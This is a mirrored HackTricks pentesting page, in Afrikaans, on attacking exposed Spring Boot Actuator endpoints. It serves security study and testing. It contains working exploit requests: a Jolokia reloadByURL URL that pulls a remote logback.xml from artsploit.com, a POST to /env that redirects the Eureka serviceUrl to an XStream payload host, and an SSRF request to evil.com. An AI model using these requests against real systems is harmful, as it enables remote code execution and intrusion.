Mirrors/hacktricks
2
0
Fork 0
mirror of https://github.com/carlospolop/hacktricks synced 2024-12-01 17:10:07 +00:00
Code Issues Projects Releases Packages Wiki Activity
hacktricks/network-services-pentesting/pentesting-web/spring-actuators.md

91 lines
5.6 KiB
Markdown
Raw Blame History

# Spring Actuators
{% hint style="success" %}
Leer & oefen AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Leer & oefen GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary>Support HackTricks</summary>
* Kyk na die [**subskripsie planne**](https://github.com/sponsors/carlospolop)!
* **Sluit aan by die** 💬 [**Discord groep**](https://discord.gg/hRep4RUj7f) of die [**telegram groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Deel hacking truuks deur PRs in te dien na die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
{% endhint %}
{% endhint %}
## **Spring Auth Bypass**
<figure><img src="../../.gitbook/assets/image (927).png" alt=""><figcaption></figcaption></figure>
**Van** [**https://raw.githubusercontent.com/Mike-n1/tips/main/SpringAuthBypass.png**](https://raw.githubusercontent.com/Mike-n1/tips/main/SpringAuthBypass.png)\*\*\*\*
## Exploiting Spring Boot Actuators
**Kyk na die oorspronklike pos van** \[**https://www.veracode.com/blog/research/exploiting-spring-boot-actuators**]
### **Belangrike Punten:**
* Spring Boot Actuators registreer eindpunte soos `/health`, `/trace`, `/beans`, `/env`, ens. In weergawes 1 tot 1.4, is hierdie eindpunte toeganklik sonder verifikasie. Vanaf weergawe 1.5 is slegs `/health` en `/info` nie-sensitief per standaard, maar ontwikkelaars deesdae dikwels hierdie sekuriteit deaktiveer.
* Sekere Actuator eindpunte kan sensitiewe data blootstel of skadelike aksies toelaat:
* `/dump`, `/trace`, `/logfile`, `/shutdown`, `/mappings`, `/env`, `/actuator/env`, `/restart`, en `/heapdump`.
* In Spring Boot 1.x, word actuators geregistreer onder die wortel-URL, terwyl dit in 2.x onder die `/actuator/` basis pad is.
### **Eksploitasiemetodes:**
1. **Afgeleë Kode-uitvoering via '/jolokia'**:
* Die `/jolokia` actuator eindpunt blootstel die Jolokia Biblioteek, wat HTTP-toegang tot MBeans toelaat.
* Die `reloadByURL` aksie kan uitgebuit word om logging konfigurasies van 'n eksterne URL te herlaai, wat kan lei tot blinde XXE of Afgeleë Kode-uitvoering via vervaardigde XML konfigurasies.
* Voorbeeld van 'n eksploit URL: `http://localhost:8090/jolokia/exec/ch.qos.logback.classic:Name=default,Type=ch.qos.logback.classic.jmx.JMXConfigurator/reloadByURL/http:!/!/artsploit.com!/logback.xml`.
2. **Konfigurasie-wijziging via '/env'**:
* As Spring Cloud Biblioteke teenwoordig is, laat die `/env` eindpunt die wijziging van omgewings eienskappe toe.
* Eienskappe kan gemanipuleer word om kwesbaarhede uit te buit, soos die XStream deserialisering kwesbaarheid in die Eureka serviceURL.
* Voorbeeld van 'n eksploit POST versoek:
```
POST /env HTTP/1.1
Host: 127.0.0.1:8090
Content-Type: application/x-www-form-urlencoded
Content-Length: 65
eureka.client.serviceUrl.defaultZone=http://artsploit.com/n/xstream
```
3. **Ander Nuttige Instellings**:
* Eienskappe soos `spring.datasource.tomcat.validationQuery`, `spring.datasource.tomcat.url`, en `spring.datasource.tomcat.max-active` kan gemanipuleer word vir verskeie eksploit, soos SQL-inspuiting of die verandering van databasisverbindingstrings.
### **Addisionele Inligting:**
* 'n Omvattende lys van standaard actuators kan [hier](https://github.com/artsploit/SecLists/blob/master/Discovery/Web-Content/spring-boot.txt) gevind word.
* Die `/env` eindpunt in Spring Boot 2.x gebruik JSON-formaat vir eiendom wijziging, maar die algemene konsep bly dieselfde.
### **Verwante Onderwerpe:**
1. **Env + H2 RCE**:
* Besonderhede oor die uitbuiting van die kombinasie van `/env` eindpunt en H2 databasis kan [hier](https://spaceraccoon.dev/remote-code-execution-in-three-acts-chaining-exposed-actuators-and-h2-database) gevind word.
2. **SSRF op Spring Boot Deur Onkorrekte Padnaam Interpretasie**:
* Die Spring raamwerk se hantering van matriksparameters (`;`) in HTTP padname kan uitgebuit word vir Server-Side Request Forgery (SSRF).
* Voorbeeld van 'n eksploit versoek:
```http
GET ;@evil.com/url HTTP/1.1
Host: target.com
Connection: close
```
{% hint style="success" %}
Leer & oefen AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Leer & oefen GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary>Support HackTricks</summary>
* Kyk na die [**subskripsie planne**](https://github.com/sponsors/carlospolop)!
* **Sluit aan by die** 💬 [**Discord groep**](https://discord.gg/hRep4RUj7f) of die [**telegram groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Deel hacking truuks deur PRs in te dien na die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
{% endhint %}
</details>
{% endhint %}
Reference in a new issue View git blame Copy permalink